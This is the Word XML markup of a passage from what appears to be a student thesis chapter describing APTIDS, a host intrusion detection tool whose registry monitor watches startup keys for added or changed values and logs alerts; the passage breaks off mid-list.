    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:lastRenderedPageBreak/>
        <w:t>Identifying Vulnerable Network Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D073C" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Many computers and network devices are deployed with default or improper configurations that expose them to various attacks. In some cases, the simple observation of a given protocol may indicate vulnerability.  Protocols such as Virtual Local Area Network (VLAN) trunking, network routing, and network redundancy protocols typically should not be propagated to the client. This is because an attacker with access to these protocols may be able to manipulate the flow of traffic across the network, expand access to other subnets, or cause denial of service.</w:t>
      </w:r>
      <w:r w:rsidR="007D073C">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00215BF8" w:rsidRPr="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00CA1AEF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc484962993"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PROJECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00E445CE">
        <w:t xml:space="preserve"> ARCHITECTURE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="0031762B" w:rsidRDefault="00E445CE" w:rsidP="008625D0">
      <w:r>
        <w:t>In this chapter, we would like to present about APTIDS, its functionalities and their operations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc484962994"/>
      <w:r>
        <w:t>APTIDS’s overall architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="004C6026" w:rsidRDefault="004C6026">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E445CE" w:rsidRDefault="00E445CE" w:rsidP="00E445CE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc484962995"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor</w:t>
      </w:r>
      <w:r w:rsidR="00CC0C0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD03D9">
        <w:t>Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
      <w:r w:rsidR="00E2646F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2D3D" w:rsidRDefault="00F10476" w:rsidP="00E90A36">
      <w:r>
        <w:t>After getting into the system operations, a</w:t>
      </w:r>
      <w:r w:rsidR="00CA6920">
        <w:t>ttacker usually wants to leave a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> persistent running program </w:t>
      </w:r>
      <w:r w:rsidR="00CA6920">
        <w:t xml:space="preserve">for running at system boot. Deploying a malware for manipulating and controlling system operations, as well as doing espionage tasks, attacker also adds that system into his bot network. When being run on a system, a malware executes it operations for completing the pre-defined tasks. One of its operation is maintain a persistent executable that helps run the malware at system startup. Malware chooses Windows Registry as one of its possible hive to hide its configurations and executable program file path </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1997150461"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:instrText xml:space="preserve"> CITATION Sik12 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(20)</w:t>
          </w:r>
          <w:r w:rsidR="00CA6920">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00CA6920">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B1B5E">
        <w:t xml:space="preserve">Therefore, to detect that any malicious executable program that has written its configurations and executable file path in to Registry Hive, we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B1B5E">
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B1B5E">
        <w:t xml:space="preserve"> deploy a real-time monitor application that always monitors the Registry for any pre-defined change, and alert upon those critical change. Though this approach leads to high rate of false-positive alarm, however it also concludes we will not miss any critical event happened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D2D3D" w:rsidRDefault="0051408A" w:rsidP="006867D5">
      <w:r>
        <w:t>There are some Registry keys that store the information for executable programs those want to start the system boot. In this case, APTIDS implements a solution for monitoring these essential keys for detecting any change happening, and triggers alert to administrators. In monitoring registry operations, we have developed APTIDS for detecting Registry</w:t>
      </w:r>
      <w:r w:rsidR="00CC0C0B">
        <w:t xml:space="preserve"> keys and values that are added, modified or value data that has been modified, in the Registry hive. </w:t>
      </w:r>
      <w:r w:rsidR="003B1B5E">
        <w:t>Since a deleted Registry key is not as harmful to system operations as an added malicious key, and since system has abilities to recover from any essential key that has been deleted which make the system unable to boot, we do not deploy a function for detecting operation that delete Registry keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D36EB" w:rsidRDefault="009D36EB">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CC0C0B" w:rsidRDefault="00CC0C0B" w:rsidP="00CC0C0B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc484962996"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Architecture</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="00CC0C0B" w:rsidRDefault="000A7B42" w:rsidP="00CC0C0B">
      <w:r>
        <w:t xml:space="preserve">The Registry Monitor Architecture can be </w:t>
      </w:r>
      <w:r w:rsidR="00782346">
        <w:t>graphically present in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRDefault="00C51A1A" w:rsidP="004113CB">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74046B5B" wp14:editId="72E4CAFE">
            <wp:extent cx="5581650" cy="6040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1650" cy="6040755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782346" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="004113CB">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc484886353"/>
      <w:r w:rsidRPr="004113CB">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004113CB">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry Monitor architecture diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9" w:rsidP="00BD03D9">
      <w:r>
        <w:t>“APTIDS.exe” is a program that runs at background of an operating system. APTIDS then creates a thread for Registry Monitor when running. Registry Monitor run as an independent thread that real-time performs operations for detecting any critical change to the pre-defined registry keys those are defined in a configuration file called “RegConfig.conf”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRPr="00BD03D9" w:rsidRDefault="00BD03D9" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc484962997"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Registry Monitor Workflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="00BD03D9" w:rsidRDefault="00BD03D9" w:rsidP="00BD03D9">
      <w:r>
        <w:t>APTIDS.exe takes “RegMon” as an argument function for starting an independent thread. RegMon then runs in background performing real-time Registry Monitor operations</w:t>
      </w:r>
      <w:r w:rsidR="00311405">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082423F">
        <w:t>present in figure 3.1</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegMon is run as an independent thread by APTIDS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegMon reads essential Registry keys in a configuration file called “RegConfig.conf”. Those keys are predefined Registry keys that an administrator want APTIDS to perform its real-time monitor on. RegConfig.conf is a plaintext file which has a XML-like format in which key is stored between an opening tag “&lt;Key&gt;” and a closing tag “&lt;/Key&gt;”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004113CB" w:rsidRPr="004113CB" w:rsidRDefault="004113CB" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>After receiving information about which key to monitor, RegMon passes the information to a function called “RegMonitor” for performing real-time monitor operations.</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> RegMon creates and handles each separated thread, which take RegMonitor as thread function, for each key defined in RegConfig.conf. For example, if there are 4 registry keys defined, RegMon creates 4 independent RegMonitor thread, each for a monitor key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C6026" w:rsidRPr="00362FBB" w:rsidRDefault="0082423F" w:rsidP="00BD03D9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>RegMonitor</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> thread passed the Registry Key information to </w:t>
      </w:r>
      <w:r>
        <w:t>“RegQuery”</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which is a function that reads into the registry keys and queries the current Registry Key information and value data. </w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve">At that time, RegMonitor set a special argument (which is defined to indicate whether there is any change happened) to be </w:t>
      </w:r>
      <w:r w:rsidR="000B664D" w:rsidRPr="000B664D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="000B664D">
        <w:t xml:space="preserve"> to tell RegQuery that there was not any change happened in the Registry for this current call. Therefore, RegQuery read the </w:t>
      </w:r>
      <w:r w:rsidR="00362FBB">
        <w:t>specified key information and return</w:t>
      </w:r>
      <w:r w:rsidR="0039660C">
        <w:t>s to RegMonitor</w:t>
      </w:r>
      <w:r w:rsidR="00362FBB">
        <w:t xml:space="preserve"> the number of subkeys along with the number of values stored in that key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00362FBB" w:rsidRDefault="00B46827" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>RegMonitor calls a Windows API named “RegNotifyChangeKeyValue”, which API runs as a separated thread and waiting for any change event that happened in the specified Registry (detail about “RegNotifyChange KeyValue” will be discussed late</w:t>
      </w:r>
      <w:r w:rsidR="00CD4CB3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>RegNotifyChangeKeyValue receive an argument for a handle Windows Event. That event handle will</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ed, along to the flow control of the running process, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>to a Windows API called “WaitForSingleObject” to wait for change happened. When change happe</w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>, WaiforSingleObject return and handle the flow control back to RegMonitor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="00B46827" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">When any change takes place in the specified Registry key that is indicated by RegNotifyChangeKeyValue, RegMonitor now set the special argument to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:i/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and calls RegQuery to get the information of that changed key. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E2A6F" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RegQuery then compare the number of keys and values that returned from step 4 to the number of current keys and values. In case there is a key or value added, based on the working concept of Windows Registry in Chapter 2, that new key or value should be added to the last chain of storing keys or values. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Therefore, to read the added information, we only need to read the final information of key or value in the appropriated key or value chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46827" w:rsidRDefault="003E2A6F" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C51A1A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>After identifying which change occur to the Registry, RegQuery calls “WriteLog” which is a function for writing Registry Monitor logs into system disk and then sends log to the distributed log collector hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C51A1A" w:rsidRDefault="00C51A1A" w:rsidP="00B46827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>When finishing writing log, RegQuery return to RegMonitor to start again at step 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46827" w:rsidRPr="00B46827" w:rsidRDefault="00A753E4" w:rsidP="00A753E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc484962998"/>
      <w:r>
        <w:t>Identifying Registry Change</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="00A753E4" w:rsidRDefault="00A753E4" w:rsidP="00A753E4">
      <w:r>
        <w:t>For identifying added key or value in Registry, RegQuery performs the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4B82" w:rsidRDefault="008B4B82" w:rsidP="008B4B82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When calling RegQuery, RegMonitor declare a variable called “aft” which stands for “After”. At the first called, RegMonitor set “aft” to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicates that this is the first call for query the number of subkeys and values. The key is now separated into the hive and the key of that hive, both are also passed to RegQuery by RegMonitor. By defined of RegMon, each RegMonitor is responsible for a key, which is passed to </w:t>
      </w:r>
      <w:r w:rsidR="00387B49">
        <w:t>RegQuery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4B82" w:rsidRPr="008B4B82" w:rsidRDefault="00A753E4" w:rsidP="00A753E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">At the first time RegQuery reads in the Registry key </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>for its subkeys and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> values, RegQuery return</w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> two integer values: a value that identifies the number of </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ubkeys belong to that key and a value identifies the nu</w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>mber of v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alues belong to that key. </w:t>
      </w:r>
      <w:r w:rsidR="008B4B82">
        <w:t>We called these two values as the names “nSubkeys” and “nValues”.</w:t>
      </w:r>
      <w:r w:rsidR="00E7062B">
        <w:t xml:space="preserve"> Along with these values, RegQuery also return names of the last subkey and value in chain. </w:t>
      </w:r>
      <w:r w:rsidR="0037653E">
        <w:t>Since Configuration Manager store registry keys in chain of bins and cells, query the last value in chain let us know the last thing that has been added to that key or value chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B49" w:rsidRPr="00387B49" w:rsidRDefault="008B4B82" w:rsidP="00A753E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When change takes place, RegMonitor calls RegQuery again, “aft” is now set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> indicates that there was any change happened to the monitoring keys.</w:t>
      </w:r>
      <w:r w:rsidR="00EE76F2">
        <w:t xml:space="preserve"> RegQuery now queries the specified registry key again to get the current number of subkeys and values, stores in “cSubkeys” and “cValues”. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE76F2" w:rsidRPr="00EE76F2" w:rsidRDefault="00B82687" w:rsidP="00EE76F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">RegQuery checks for identifying </w:t>
      </w:r>
      <w:r w:rsidR="00EE76F2">
        <w:t>registry change as follow:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE76F2" w:rsidRPr="00EE76F2" w:rsidRDefault="00EE76F2" w:rsidP="00EE76F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If cSubkeys &gt; nSubkeys, there was a subkey added to the specified key. Also check whether cValues &gt; nValues. For getting the added value or subkey, just get the last subkey or value in the subkey or value chain, using APIs as RegEnumKeyEx or RegEnumValue. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC0348" w:rsidRPr="00FC0348" w:rsidRDefault="00FC0348" w:rsidP="00FC0348">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
